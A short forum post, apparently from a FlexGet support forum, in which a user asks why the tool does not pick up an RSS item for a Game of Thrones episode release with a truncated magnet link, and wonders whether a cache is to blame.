<title>Game of Thrones S08E03 1080p WEB H264 MEMENTO</title>
<link>
magnet:?

...so why is FlexGet not picking it up?

There is literally NO mention of the word 'Thrones' in my FlexGet log.

Is there a cache or something causing an issue?

Thanks,

Paully

Posts: 1

Participants: 1

Read full topic

Viewing all 376 articles
Browse latest View live